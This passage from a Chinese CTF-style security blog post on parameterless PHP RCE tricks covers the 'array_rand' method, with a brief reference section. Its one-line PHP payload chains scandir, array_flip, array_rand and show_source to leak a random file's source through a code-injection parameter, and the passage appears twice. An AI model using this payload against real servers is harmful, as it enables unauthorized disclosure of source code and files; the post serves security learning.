<p>​	首先，在这里吐槽一句，赌狗不值得同情 [doge]</p>
<p>​	可以通过 array_rand () 函数随机获取数组中的键，因此，需要提前将数组键值对翻转以下，让后再使用如下 payload 进行赌。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp=<span class="title function_ invoke__">show_source</span>(<span class="title function_ invoke__">array_rand</span>(<span class="title function_ invoke__">array_flip</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">current</span>(<span class="title function_ invoke__">localeconv</span>())))));</span><br></pre></td></tr></table></figure>
<p>​	因为这种很考验运气，因此，当目录中文件过多的情况下只有赌一把运气，可能一两下就出了，可能要花很长时间，因此，还是那句话，赌狗不值得同情 [doge]。</p>
<p>​</p>
<h1 id="参考资料"><a class="markdownIt-Anchor" href="#参考资料">#</a> 参考资料：</h1>
<p>​	可以通过 array_rand () 函数随机获取数组中的键，因此，需要提前将数组键值对翻转以下，让后再使用如下 payload 进行赌。</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?exp=<span class="title function_ invoke__">show_source</span>(<span class="title function_ invoke__">array_rand</span>(<span class="title function_ invoke__">array_flip</span>(<span class="title function_ invoke__">scandir</span>(<span class="title function_ invoke__">current</span>(<span class="title function_ invoke__">localeconv</span>())))));</span><br></pre></td></tr></table></figure>
<p>​	因为这种很考验运气，因此，当目录中文件过多的情况下只有赌一把运气，可能一两下就出了，可能要花很长时间，因此，还是那句话，赌狗不值得同情 [doge]。</p>
<p>​</p>
<h1 id="参考资料-2"><a class="markdownIt-Anchor" href="#参考资料-2">#</a> 参考资料：</h1>
<p><span class="exturl" data-url="aHR0cHM6Ly9ibG9nLmNzZG4ubmV0LzIzMDFfNzY2OTA5MDUvYXJ0aWNsZS9kZXRhaWxzLzEzMzgwODUzNg==">https://blog.csdn.net/2301_76690905/article/details/133808536</span></p>

      <div class="tags">
          <a href="/tags/Web/" rel="tag"><i class="ic i-tag"></i> Web</a>
      </div>
  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2024-06-20 22:45:51" itemprop="dateModified" datetime="2024-06-20T22:45:51+08:00">2024-06-20</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="g01den 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="g01den 支付宝">
        <p>支付宝</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="g01den 贝宝">
        <p>贝宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>g01den <i class="ic i-at"><em>@</em></i>golden的部落阁
  </li>
  <li class="link">
    <strong>本文链接：</strong>
    <a href="http://blog.g01den.top/posts/88915f6f.html" title="无参数RCE的一些奇技淫巧">http://blog.g01den.top/posts/88915f6f.html</a>
  </li>
  <li class="license">
    <strong>版权声明： </strong>本站所有文章除特别声明外，均采用 <span class="exturl" data-url="aHR0cHM6Ly9jcmVhdGl2ZWNvbW1vbnMub3JnL2xpY2Vuc2VzL2J5LW5jLXNhLzQuMC96aC1DTg=="><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</span> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

  </footer>

</article>

  </div>
  

<div class="post-nav">
    <div class="item left">
      

  <a href="/posts/efb4c08.html" itemprop="url" rel="prev" data-background-image="https:&#x2F;&#x2F;gitee.com&#x2F;gou-dengyue&#x2F;images&#x2F;raw&#x2F;master&#x2F;picture236.jpg" title="pwn学习笔记（7）--堆相关源码">
  <span class="type">上一篇</span>
  <span class="category"><i class="ic i-flag"></i> Pwn手的自我修养</span>
  <h3>pwn学习笔记（7）--堆相关源码</h3>
  </a>

    </div>
    <div class="item right">
      

  <a href="/posts/fe4eec6d.html" itemprop="url" rel="next" data-background-image="https:&#x2F;&#x2F;s2.loli.net&#x2F;2024&#x2F;06&#x2F;20&#x2F;2y7VdpzYebBtsnR.jpg" title="【2024】高校网络安全管理运维赛">
  <span class="type">下一篇</span>
  <span class="category"><i class="ic i-flag"></i> CTFer的比赛之路</span>
  <h3>【2024】高校网络安全管理运维赛</h3>
  </a>

    </div>
</div>

  
  <div class="wrap" id="comments"></div>


        </div>
        <div id="sidebar">
          

<div class="inner">

  <div class="panels">
    <div class="inner">
      <div class="contents panel pjax" data-title="文章目录">
          <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%AE%80%E8%BF%B0"><span class="toc-number">1.</span> <span class="toc-text"> 简述：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E7%9B%B8%E5%85%B3%E5%87%BD%E6%95%B0%E8%AE%B2%E8%A7%A3"><span class="toc-number">2.</span> <span class="toc-text"> 相关函数讲解：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E9%A2%98%E7%9B%AE%E7%A4%BA%E4%BE%8Bgxyctf-2019%E7%A6%81%E6%AD%A2%E5%A5%97%E5%A8%83"><span class="toc-number">3.</span> <span class="toc-text"> 题目示例：[GXYCTF 2019] 禁止套娃</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#1%E5%B8%B8%E8%A7%84%E6%96%B9%E6%B3%95"><span class="toc-number">4.</span> <span class="toc-text"> 1. 常规方法：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#2session_id"><span class="toc-number">5.</span> <span class="toc-text"> 2.session_id()</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#3getallheaders"><span class="toc-number">6.</span> <span class="toc-text"> 3.getallheaders()</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#4get_defined_vars"><span class="toc-number">7.</span> <span class="toc-text"> 4.get_defined_vars()</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#5chdir"><span class="toc-number">8.</span> <span class="toc-text"> 5.chdir()</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#6array_rand%E8%B5%8C%E7%8B%97%E5%BF%85%E5%A4%87%E6%B3%95"><span class="toc-number">9.</span> <span class="toc-text"> 6.array_rand ()# 赌狗必备法：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99"><span class="toc-number">10.</span> <span class="toc-text"> 参考资料：</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%8F%82%E8%80%83%E8%B5%84%E6%96%99-2"><span class="toc-number">11.</span> <span class="toc-text"> 参考资料：</span></a></li></ol>
      </div>
      <div class="related panel pjax" data-title="系列文章">
        <ul>
          <li><a href="/posts/384200ef.html" rel="bookmark" title="SQL无列名注入">SQL无列名注入</a></li><li class="active"><a href="/posts/88915f6f.html" rel="bookmark" title="无参数RCE的一些奇技淫巧">无参数RCE的一些奇技淫巧</a></li><li><a href="/posts/2f610211.html" rel="bookmark" title="反弹shell">反弹shell</a></li><li><a href="/posts/ff5b88d5.html" rel="bookmark" title="python原型链污染">python原型链污染</a></li><li><a href="/posts/97a7dff3.html" rel="bookmark" title="ctfshow-信息搜集">ctfshow-信息搜集</a></li><li><a href="/posts/53e2b2e1.html" rel="bookmark" title="ctfshow-命令执行">ctfshow-命令执行</a></li><li><a href="/posts/4fb535d6.html" rel="bookmark" title="ctfshow-反序列化">ctfshow-反序列化</a></li><li><a href="/posts/b856856d.html" rel="bookmark" title="ctfshow-ssrf">ctfshow-ssrf</a></li>
        </ul>
      </div>
      <div class="overview panel" data-title="站点概览">
        <div class="author" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <img class="image" itemprop="image" alt="g01den"
      data-src="/images/avatar.jpg">
  <p class="name" itemprop="name">g01den</p>
  <div class="description" itemprop="description">golden的部落阁</div>
</div>

<nav class="state">
    <div class="item posts">
      <a href="/archives/">
        <span class="count">39</span>
        <span class="name">文章</span>
      </a>
    </div>
    <div class="item categories">
      <a href="/categories/">
        <span class="count">10</span>
        <span class="name">分类</span>
      </a>
    </div>
    <div class="item tags">
      <a href="/tags/">
        <span class="count">8</span>
        <span class="name">标签</span>
      </a>
    </div>
</nav>

<div class="social">
      <span class="exturl item github" data-url="aHR0cHM6Ly9naXRodWIuY29tL2cwMWRlbjE=" title="https:&#x2F;&#x2F;github.com&#x2F;g01den1"><i class="ic i-github"></i></span>
</div>

<ul class="menu">
  
    
  <li class="item">
    <a href="/" rel="section"><i class="ic i-home"></i>首页</a>
  </li>

    
  <li class="item">
    <a href="/about/" rel="section"><i class="ic i-user"></i>关于</a>
  </li>

        
  <li class="item dropdown">
      <a href="javascript:void(0);"><i class="ic i-feather"></i>文章</a>
    <ul class="submenu">

        
  <li class="item">
    <a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a>
  </li>

        
  <li class="item">
    <a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a>
  </li>

        
  <li class="item">
    <a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a>
  </li>

  </ul>
    
  <li class="item">
    <a href="/links/" rel="section"><i class="ic i-magic"></i>links</a>
  </li>


</ul>

      </div>
    </div>
  </div>

  <ul id="quick">
    <li class="prev pjax">
        <a href="/posts/efb4c08.html" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a>
    </li>
    <li class="up"><i class="ic i-arrow-up"></i></li>
    <li class="down"><i class="ic i-arrow-down"></i></li>
    <li class="next pjax">
        <a href="/posts/fe4eec6d.html" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a>
    </li>
    <li class="percent"></li>
  </ul>
</div>


        </div>
        <div class="dimmer"></div>
      </div>
    </main>
    <footer id="footer">
      <div class="inner">
        <div class="widgets">
          
<div class="rpost pjax">
  <h2>随机文章</h2>
  <ul>
      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Pwn/" title="分类于 Pwn手的自我修养">Pwn手的自我修养</a>
</div>

    <span><a href="/posts/e20e7502.html" title="pwn学习笔记（3）ret2syscall">pwn学习笔记（3）ret2syscall</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Game/" title="分类于 CTFer的比赛之路">CTFer的比赛之路</a>
</div>

    <span><a href="/posts/9dd9bec.html" title="Ciscn2024">Ciscn2024</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Web/" title="分类于 Web狗的自我安慰">Web狗的自我安慰</a>
</div>

    <span><a href="/posts/2f610211.html" title="反弹shell">反弹shell</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Pwn/" title="分类于 Pwn手的自我修养">Pwn手的自我修养</a>
</div>

    <span><a href="/posts/9b0d93f7.html" title="Pwn刷题记录（不停更新）">Pwn刷题记录（不停更新）</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Major/" title="分类于 考研专业课">考研专业课</a>
<i class="ic i-angle-right"></i>
<a href="/categories/Major/%E6%95%B0%E6%8D%AE%E7%BB%93%E6%9E%84/" title="分类于 数据结构">数据结构</a>
</div>

    <span><a href="/posts/2c763aa6.html" title="数据结构-3、栈、队列和数组">数据结构-3、栈、队列和数组</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Web/" title="分类于 Web狗的自我安慰">Web狗的自我安慰</a>
</div>

    <span><a href="/posts/ff5b88d5.html" title="python原型链污染">python原型链污染</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Pwn/" title="分类于 Pwn手的自我修养">Pwn手的自我修养</a>
</div>

    <span><a href="/posts/c06afb6e.html" title="Pwn学习笔记（1）--前置知识">Pwn学习笔记（1）--前置知识</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Game/" title="分类于 CTFer的比赛之路">CTFer的比赛之路</a>
</div>

    <span><a href="/posts/4bf5e0ee.html" title="【2024】LitCTF">【2024】LitCTF</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Pwn/" title="分类于 Pwn手的自我修养">Pwn手的自我修养</a>
</div>

    <span><a href="/posts/efb4c08.html" title="pwn学习笔记（7）--堆相关源码">pwn学习笔记（7）--堆相关源码</a></span>
  </li>

      
  <li class="item">
    
<div class="breadcrumb">
<a href="/categories/Game/" title="分类于 CTFer的比赛之路">CTFer的比赛之路</a>
</div>

    <span><a href="/posts/666fe8df.html" title="【2024】强网杯">【2024】强网杯</a></span>
  </li>

  </ul>
</div>
<div>
  <h2>最新评论</h2>
  <ul class="leancloud-recent-comment"></ul>
</div>

        </div>
        <div class="status">
  <div class="copyright">
    
    &copy; 2010 – 
    <span itemprop="copyrightYear">2024</span>
    <span class="with-love">
      <i class="ic i-sakura rotate"></i>
    </span>
    <span class="author" itemprop="copyrightHolder">g01den @ golden的部落阁</span>
  </div>
  <div class="powered-by">
    基于 <span class="exturl" data-url="aHR0cHM6Ly9oZXhvLmlv">Hexo</span> & Theme.<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL2FtZWhpbWUvaGV4by10aGVtZS1zaG9rYQ==">Shoka</span>
     <p><a target="_blank" rel="noopener" href="https://beian.miit.gov.cn">蜀ICP备2024083302号</a><!--|<a target="_blank" rel="noopener" href="https://beian.mps.gov.cn/#/query/webSearch">公网安备XXXXXXXX号</a> -->
  </div>
</div>

      </div>
    </footer>
  </div>
<script data-config type="text/javascript">
  var LOCAL = {
    path: 'posts/88915f6f.html',
    favicon: {
      show: "（●´3｀●）やれやれだぜ",
      hide: "(´Д｀)大変だ！"
    },
    search : {
      placeholder: "文章搜索",
      empty: "关于 「 ${query} 」，什么也没搜到",
      stats: "${time} ms 内找到 ${hits} 条结果"
    },
    valine: true,fancybox: true,
    copyright: '复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。',
    ignores : [
      function(uri) {
        return uri.includes('#');
      },
      function(uri) {
        return new RegExp(LOCAL.path+"$").test(uri);
      }
    ]
  };
</script>

<script src="https://cdn.polyfill.io/v2/polyfill.js"></script>

<script src="//fastly.jsdelivr.net/combine/npm/pace-js@1.0.2/pace.min.js,npm/pjax@0.2.8/pjax.min.js,npm/whatwg-fetch@3.4.0/dist/fetch.umd.min.js,npm/animejs@3.2.0/lib/anime.min.js,npm/algoliasearch@4/dist/algoliasearch-lite.umd.js,npm/instantsearch.js@4/dist/instantsearch.production.min.js,npm/lozad@1/dist/lozad.min.js,npm/quicklink@2/dist/quicklink.umd.js"></script>

<script src="/js/app.js?v=0.2.5"></script>




<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/koharu.model.json"},"display":{"position":"left","width":150,"height":300},"mobile":{"show":false},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/"});</script></body>
</html>
